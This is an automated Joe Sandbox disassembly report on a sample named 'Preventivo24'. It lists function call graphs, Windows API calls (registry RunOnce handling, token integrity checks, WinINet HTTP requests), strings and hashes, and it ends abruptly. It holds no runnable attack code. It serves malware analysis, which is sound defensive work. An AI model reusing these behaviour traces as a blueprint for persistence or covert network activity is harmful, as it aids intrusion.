fae2b1 PathIsUNCW 60197->60198 60200 fae39c 60198->60200 60201 fae2c6 60198->60201 60199->60099 60203 fb00a0 47 API calls 60200->60203 60296 fb00a0 60201->60296 60204 fae3c1 60203->60204 60204->60194 60206 fae3c8 60204->60206 60205 fae2eb 60205->60194 60207 fae2f6 60205->60207 60208 e87cf0 38 API calls 60206->60208 60209 e87cf0 38 API calls 60207->60209 60210 fae2ff std::locale::_Locimp::_Locimp 60208->60210 60209->60210 60301 e8a1f0 38 API calls std::locale::_Locimp::_Locimp 60210->60301 60213 ea5d58 60212->60213 60214 ea5d41 60212->60214 60215 e8b070 2 API calls 60213->60215 60217 ea5d6a 60213->60217 60214->60213 60303 e8ae70 39 API calls 60214->60303 60218 ea5d85 60215->60218 60217->60118 60220 fc2bc7 60219->60220 60226 fc2a79 60219->60226 60221 108ab55 3 API calls 60220->60221 60222 fc2bd1 60221->60222 60222->60226 60228 fc2c30 60222->60228 60226->60129 60226->60130 60227->60130 60229 fc2c88 RegOpenKeyExW 60228->60229 60231 fc2f8e 60229->60231 60232 fc2cb6 RegQueryValueExW RegQueryValueExW 60229->60232 60233 fc2fa9 RegCloseKey 60231->60233 60234 fc2fba 60231->60234 60235 fc2d7b RegQueryValueExW 60232->60235 60236 fc2d1b RegQueryValueExW 60232->60236 60233->60234 60237 108a6f5 _ValidateLocalCookies 5 API calls 60234->60237 60239 fc2dc2 60235->60239 60236->60235 60238 fc2d53 60236->60238 60240 fc2bfa 60237->60240 60238->60235 60238->60238 60241 fc2e08 RegQueryValueExW 60239->60241 60256 108ab04 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 60240->60256 60242 fc2e5e RegQueryValueExW 60241->60242 60244 fc2e39 60241->60244 60245 fc2e8f 60242->60245 60243 fc2f46 60247 fc2f50 GetCurrentProcess 60243->60247 60248 fc2f82 60243->60248 60244->60242 60245->60243 60246 108ab55 3 API calls 60245->60246 60249 fc2f09 60246->60249 60252 fc2f70 IsWow64Process 60247->60252 60257 fc2fe0 60248->60257 60249->60243 60251 fc2f15 GetModuleHandleW GetProcAddress 60249->60251 60268 108ab04 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 60251->60268 60252->60248 60253 fc2f76 60252->60253 60253->60248 60255 fc2f43 60255->60243 60256->60226 60258 fc303a RegOpenKeyExW 60257->60258 60260 fc3068 RegQueryValueExW 60258->60260 60267 fc311c 60258->60267 60263 fc30e7 RegQueryValueExW 60260->60263 60266 fc3099 60260->60266 60261 fc32ed RegCloseKey 60262 fc32fe 60261->60262 60264 108a6f5 _ValidateLocalCookies 5 API calls 60262->60264 60263->60267 60265 fc3316 60264->60265 60265->60231 60266->60263 60267->60261 60267->60262 60268->60255 60270 fb92cd GetCurrentProcess OpenProcessToken 60269->60270 60272 fb92e9 GetLastError 60270->60272 60273 fb92f6 GetTokenInformation 60270->60273 60276 fb93a0 60272->60276 60274 fb9347 60273->60274 60275 fb9317 GetLastError 60273->60275 60277 fb939a GetLastError 60274->60277 60279 fb934d AllocateAndInitializeSid 60274->60279 60275->60277 60278 fb9322 60275->60278 60280 fb93cb FindCloseChangeNotification 60276->60280 60281 fb93d9 60276->60281 60277->60276 60285 fb932d GetTokenInformation 60278->60285 60279->60276 60282 fb937e EqualSid FreeSid 60279->60282 60280->60281 60283 108a6f5 _ValidateLocalCookies 5 API calls 60281->60283 60282->60276 60284 e9347b 60283->60284 60284->60143 60284->60144 60285->60274 60285->60277 60286->60147 60287->60134 60288->60160 60289->60156 60290->60168 60291->60171 60292->60175 60293->60182 60294->60163 60295->60185 60297 fb00ad 60296->60297 60298 fb00c0 ___vcrt_FlsFree 60296->60298 60297->60298 60302 10961db 47 API calls 2 library calls 60297->60302 60298->60205 60300 fb00d6 60300->60205 60301->60193 60302->60300 60303->60213 60304 10876f5 60305 10876a6 60304->60305 60305->60304 60306 10879ed ___delayLoadHelper2@8 17 API calls 60305->60306 60306->60305 60307 ffbb40 60342 ffc950 ResetEvent InternetConnectW 60307->60342 60310 ffc836 60311 e8ab00 39 API calls 60312 ffbbe4 ResetEvent HttpOpenRequestW 60311->60312 60314 ffbc5e SetEvent 60312->60314 60315 ffbc7e 60314->60315 60316 e8b400 45 API calls 60315->60316 60321 ffbd02 60316->60321 60317 ffc849 60318 e8b070 2 API calls 60317->60318 60319 ffc853 60318->60319 60320 e8b070 2 API calls 60319->60320 60322 ffc85d 60320->60322 60321->60317 60323 e8b400 45 API calls 60321->60323 60340 ffbe75 60323->60340 60324 ffc040 ResetEvent HttpSendRequestW 60325 ffc096 SetEvent 60324->60325 60324->60340 60325->60340 60327 ffc0b4 HttpQueryInfoW 60328 ffc71b GetLastError 60327->60328 60329 ffc0e8 HttpQueryInfoW 60327->60329 60331 ffc6e9 60328->60331 60329->60340 60330 ffc127 HttpQueryInfoW 60330->60340 60332 ffc7c0 60331->60332 60333 ffc790 ResetEvent InternetCloseHandle WaitForSingleObject WaitForSingleObject 60331->60333 60334 ffc7d2 InternetCloseHandle 60332->60334 60335 ffc7e0 InternetSetStatusCallbackW InternetCloseHandle 60332->60335 60333->60332 60334->60335 60335->60310 60336 ffc18e HttpQueryInfoW 60336->60340 60338 ffc25e HttpQueryInfoW 60338->60340 60339 e8ac40 2 API calls 60339->60340 60340->60317 60340->60324 60340->60327 60340->60330 60340->60331 60340->60336 60340->60338 60340->60339 60341 e8b400 45 API calls 60340->60341 60348 ffca10 GetLastError WaitForSingleObject 60340->60348 60341->60340 60343 ffc9ed SetEvent 60342->60343 60344 ffc990 GetLastError 60342->60344 60345 ffbb92 60343->60345 60344->60345 60346 ffc99d 60344->60346 60345->60310 60345->60311 60346->60345 60347 ffc9c5 WaitForSingleObject 60346->60347 60347->60345 60347->60346 60348->60340
                                                                              APIs
                                                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?,SystemFolder,0000000C), ref: 00FD3E90
                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00FD3F7A
                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D), ref: 00FD409F
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D), ref: 00FD41A6
                                                                                • Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D), ref: 00FD42E1
                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,?,WindowsVolume,0000000D), ref: 00FD43C2
                                                                              • LoadLibraryW.KERNEL32(shfolder.dll), ref: 00FD4452
                                                                              • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00FD4492
                                                                                • Part of subcall function 00FC7E90: LoadLibraryW.KERNEL32(Shlwapi.dll,-00000001,00000000,?,?,?,?,?,?,?,?,00FD456B,?), ref: 00FC7EAF
                                                                                • Part of subcall function 00FC7E90: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00FC7EC5
                                                                                • Part of subcall function 00FC7E90: FreeLibrary.KERNEL32(00000000), ref: 00FC7F08
                                                                              • GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104), ref: 00FD46B0
                                                                              • SHGetPathFromIDListW.SHELL32(?,?), ref: 00FD4729
                                                                              • SHGetMalloc.SHELL32(00000000), ref: 00FD4742
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibrary$AddressFolderLoadPathProcWindows$EnvironmentFileFindFreeFromHeapListLocationMallocModuleNameProcessResourceSpecialSystemVariable
                                                                              • String ID: APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFiles64Folder$ProgramFilesFolder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$Shell32.dll$Shlwapi.dll$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll
                                                                              • API String ID: 2967964373-2261365735
                                                                              • Opcode ID: 9686efa25dcd9933a4419f86110cdfb15c0f1ca9403c88ff05ec8a7e624d1423
                                                                              • Instruction ID: 5cfe02054ea03b6d0a8a92a68d53a929a9c4472d88a0019a420439c422a10b87
                                                                              • Opcode Fuzzy Hash: 9686efa25dcd9933a4419f86110cdfb15c0f1ca9403c88ff05ec8a7e624d1423
                                                                              • Instruction Fuzzy Hash: F2621C319002198BDB28DF24CC55BB9B3B7FF55324F1841AAD816A7391DB32AE85DF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000001,010FB076,00000000,00000000,010FB076,00000000,?,?,010FB076,000000FF), ref: 00FD7E70
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: HeapLibraryLoadProcess
                                                                              • String ID: ====== Starting logging of "$" ====$Advinst_$Command line to pass to MSI:$Full command line:
                                                                              • API String ID: 3872204244-3828228616
                                                                              • Opcode ID: 93869cbe23dc0b768d8546c3a5983fa29fda9f4a6a13e5ba20a4a2b18087ee2e
                                                                              • Instruction ID: d54ef68a5cdddeb4b2de312d0914ff354549e075352bb69fa5990fcb2605dda4
                                                                              • Opcode Fuzzy Hash: 93869cbe23dc0b768d8546c3a5983fa29fda9f4a6a13e5ba20a4a2b18087ee2e
                                                                              • Instruction Fuzzy Hash: EFB2C331A006098BDB18EF68C8557AEB7B6FF44320F18416EE915AB3D1DF349D06DB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1081 1002440-10024c3 GetUserNameW 1082 1002513-1002551 GetEnvironmentVariableW 1081->1082 1083 10024c5-10024ce GetLastError 1081->1083 1085 1002553-100255b 1082->1085 1086 1002598-10025d8 call e87cf0 call e886c0 * 2 1082->1086 1083->1082 1084 10024d0-10024d8 1083->1084 1088 10024f0-10024f8 call e91210 1084->1088 1089 10024da-10024ee 1084->1089 1090 1002573-100257b call e91210 1085->1090 1091 100255d-1002571 1085->1091 1101 10025da-10025ec 1086->1101 1102 100260c-1002629 1086->1102 1094 10024fd-100250d GetUserNameW 1088->1094 1089->1094 1096 1002580-1002592 GetEnvironmentVariableW 1090->1096 1091->1096 1094->1082 1096->1086 1103 1002602-1002609 call 108a703 1101->1103 1104 10025ee-10025fc 1101->1104 1105 1002659-1002689 call 108a6f5 1102->1105 1106 100262b-100263d 1102->1106 1103->1102 1104->1103 1110 100268a-1002711 call 108fa4f call 1002b40 call fbad40 call e88ed0 1104->1110 1107 100264f-1002656 call 108a703 1106->1107 1108 100263f-100264d 1106->1108 1107->1105 1108->1107 1108->1110 1124 1002713-1002734 call fa6570 1110->1124 1125 100273c-1002742 1110->1125 1129 1002739 1124->1129 1127 1002744 1125->1127 1128 1002746-1002775 RegDeleteValueW call e88ed0 * 2 1125->1128 1127->1128 1134 1002785-10027fb call e887f0 call fbad40 1128->1134 1135 1002777-100277e RegCloseKey 1128->1135 1129->1125 1140 10027fd-100280f 1134->1140 1141 100282f-1002849 1134->1141 1135->1134 1142 1002811-100281f 1140->1142 1143 1002825-100282c call 108a703 1140->1143 1144 1002880-10028e2 call 1002cf0 call fbad40 RegQueryInfoKeyW 1141->1144 1145 100284b-100287b call fa6570 1141->1145 1142->1143 1146 1002b2b call 108fa4f 1142->1146 1143->1141 1158 10028e4-1002905 call e88ed0 * 2 1144->1158 1159 100291e-100293f call e88ed0 * 2 1144->1159 1145->1144 1153 1002b30-1002b35 call 108fa4f 1146->1153 1168 1002915-100291c 1158->1168 1169 1002907-100290e RegCloseKey 1158->1169 1170 1002941-1002948 RegCloseKey 1159->1170 1171 100294f-100295a 1159->1171 1172 100296b-10029a7 call e88ed0 * 3 1168->1172 1169->1168 1170->1171 1173 100295c 1171->1173 1174 100295e-1002965 RegDeleteKeyW 1171->1174 1181 10029a9-10029b0 RegCloseKey 1172->1181 1182 10029ba-1002a11 call e887f0 call fbad40 1172->1182 1173->1174 1174->1172 1181->1182 1187 1002a13-1002a25 1182->1187 1188 1002a45-1002a61 1182->1188 1191 1002a27-1002a35 1187->1191 1192 1002a3b-1002a42 call 108a703 1187->1192 1189 1002aa1-1002aa5 1188->1189 1190 1002a63-1002a9b call fa6570 1188->1190 1194 1002aa7 1189->1194 1195 1002aa9-1002ac7 RegDeleteValueW call e88ed0 1189->1195 1190->1189 1191->1153 1191->1192 1192->1188 1194->1195 1200 1002acc-1002aea call e88ed0 1195->1200 1203 1002aec-1002af3 RegCloseKey 1200->1203 1204 1002afd-1002b2a call 108a6f5 1200->1204 1203->1204
                                                                              APIs
                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 010024BB
                                                                              • GetLastError.KERNEL32 ref: 010024C5
                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 0100250D
                                                                              • GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 01002547
                                                                              • GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,-00000001,00000000), ref: 01002592
                                                                              • RegDeleteValueW.KERNEL32(?,?,00000000,80000001,00000001,00000000,B5580983), ref: 01002748
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000,B5580983), ref: 01002778
                                                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,B5580983,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 010028CF
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 01002908
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 01002942
                                                                              • RegDeleteKeyW.ADVAPI32(?,00000000), ref: 01002965
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 010029AA
                                                                              • RegDeleteValueW.KERNEL32(?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 01002AAB
                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 01002AED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Close$Delete$EnvironmentNameUserValueVariable$ErrorInfoLastQuery
                                                                              • String ID: Software$Software\Microsoft\Windows\CurrentVersion\RunOnce$UserDomain
                                                                              • API String ID: 1615433478-4079418357
                                                                              • Opcode ID: 1ffcf6bef1e60fc85d5db7e20b5b168ecceebe81599804e891c4fa27986c9367
                                                                              • Instruction ID: f5aaa008ba3a1b8c9e58cde9b08454a26cab90786ece1b2ae46cab6846b2b9eb
                                                                              • Opcode Fuzzy Hash: 1ffcf6bef1e60fc85d5db7e20b5b168ecceebe81599804e891c4fa27986c9367
                                                                              • Instruction Fuzzy Hash: 29227B70D00209DFEB25EFA8CD59BEEBBB4AF14304F244199E455B7281DBB46A88CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FindClose.KERNEL32(00000000), ref: 00EA536F
                                                                              • PathIsUNCW.SHLWAPI(00000000,*.*,00000000), ref: 00EA5436
                                                                              • FindFirstFileW.KERNEL32(00000000,?,*.*,00000000), ref: 00EA55C9
                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EA55E3
                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,?,00000000), ref: 00EA5620
                                                                              • FindClose.KERNEL32(00000000), ref: 00EA5684
                                                                              • SetLastError.KERNEL32(0000007B), ref: 00EA568E
                                                                              • PathIsUNCW.SHLWAPI(?,?,B5580983,*.*,?), ref: 00EA58F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Path$Find$CloseFullName$ErrorFileFirstLast
                                                                              • String ID: *.*$\\?\$\\?\UNC\
                                                                              • API String ID: 2310598285-1700010636
                                                                              • Opcode ID: 69bf733149b79a5f00bece6b5d0d6157b01a343ee54237aa20a3087de4da8f67
                                                                              • Instruction ID: b04a9826ce84ab996b9b570f6a5a28f1400edbba9829a567b562e83e42010ddb
                                                                              • Opcode Fuzzy Hash: 69bf733149b79a5f00bece6b5d0d6157b01a343ee54237aa20a3087de4da8f67
                                                                              • Instruction Fuzzy Hash: 0A42D032A00A05CFCB14DF68C8887AEB7B1FF59328F144269E815AF391D735AD45CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2261 fb9280-fb92e7 GetCurrentProcess OpenProcessToken 2264 fb92e9-fb92f1 GetLastError 2261->2264 2265 fb92f6-fb9315 GetTokenInformation 2261->2265 2268 fb93b6-fb93c9 2264->2268 2266 fb9347-fb934b 2265->2266 2267 fb9317-fb9320 GetLastError 2265->2267 2269 fb939a GetLastError 2266->2269 2271 fb934d-fb937c AllocateAndInitializeSid 2266->2271 2267->2269 2270 fb9322-fb9345 call fb9400 GetTokenInformation 2267->2270 2272 fb93cb-fb93d2 FindCloseChangeNotification 2268->2272 2273 fb93d9-fb93f5 call 108a6f5 2268->2273 2276 fb93a0 2269->2276 2270->2266 2270->2269 2275 fb937e-fb9398 EqualSid FreeSid 2271->2275 2271->2276 2272->2273 2280 fb93a2-fb93af call 108aca0 2275->2280 2276->2280 2280->2268
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32 ref: 00FB92D2
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00FB92DF
                                                                              • GetLastError.KERNEL32 ref: 00FB92E9
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00FB930D
                                                                              • GetLastError.KERNEL32 ref: 00FB9317
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 00FB933D
                                                                              • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9374
                                                                              • EqualSid.ADVAPI32(00000000,?), ref: 00FB9383
                                                                              • FreeSid.ADVAPI32(?), ref: 00FB9392
                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00FB93CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Token$ErrorInformationLastProcess$AllocateChangeCloseCurrentEqualFindFreeInitializeNotificationOpen
                                                                              • String ID:
                                                                              • API String ID: 2037597787-0
                                                                              • Opcode ID: 61fa54b873924569b3c2a0a0a80c3ea5416fc0c06f420f05941c8e2bead50393
                                                                              • Instruction ID: 8959ef4148347696df5eb4b1c1dd02738dde6bdd59926c0eb40628afdf6b4406
                                                                              • Opcode Fuzzy Hash: 61fa54b873924569b3c2a0a0a80c3ea5416fc0c06f420f05941c8e2bead50393
                                                                              • Instruction Fuzzy Hash: FB413471D05209EFDF249FA1D949BEEBBB8FF09314F144129E522B2280D7B95944DFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              Strings
                                                                              • AI_CF_FRAME_BORDER3_COLORS, xrefs: 00E81665
                                                                              • AI_CF_FRAME_CAPTION2_COLORS, xrefs: 00E8150A
                                                                              • AI_CF_CLOSEBTN_BASE_COLOR, xrefs: 00E8158E
                                                                              • AI_CF_FRAME_BASE_COLOR, xrefs: 00E814CC
                                                                              • AI_CF_FRAME_BORDER2_COLORS, xrefs: 00E81612
                                                                              • AI_CF_CLOSEBTN_BORDER_COLORS, xrefs: 00E8172F
                                                                              • AI_CF_CLOSEBTN_COLORS, xrefs: 00E816FC
                                                                              • AI_CF_MINBTN_BASE_COLOR, xrefs: 00E8154C
                                                                              • AI_CF_FRAME_BORDER1_COLORS, xrefs: 00E815D0
                                                                              • AI_CF_MINBTN_COLORS, xrefs: 00E81696
                                                                              • AI_CF_MINBTN_BORDER_COLORS, xrefs: 00E816C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: AI_CF_CLOSEBTN_BASE_COLOR$AI_CF_CLOSEBTN_BORDER_COLORS$AI_CF_CLOSEBTN_COLORS$AI_CF_FRAME_BASE_COLOR$AI_CF_FRAME_BORDER1_COLORS$AI_CF_FRAME_BORDER2_COLORS$AI_CF_FRAME_BORDER3_COLORS$AI_CF_FRAME_CAPTION2_COLORS$AI_CF_MINBTN_BASE_COLOR$AI_CF_MINBTN_BORDER_COLORS$AI_CF_MINBTN_COLORS
                                                                              • API String ID: 0-1938184520
                                                                              • Opcode ID: 191259035799afa3b382c943686b6dd96b25382fe1a2ea5d2297fee375077b94
                                                                              • Instruction ID: d58c8d781197a2fd68a22195094c185be4579afd5de7c92431de82e031f043f5
                                                                              • Opcode Fuzzy Hash: 191259035799afa3b382c943686b6dd96b25382fe1a2ea5d2297fee375077b94
                                                                              • Instruction Fuzzy Hash: E9A16D70D45399DAEB60DF65C949BDDBBB0AF16308F108289E4483B281DBB91BC8DF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
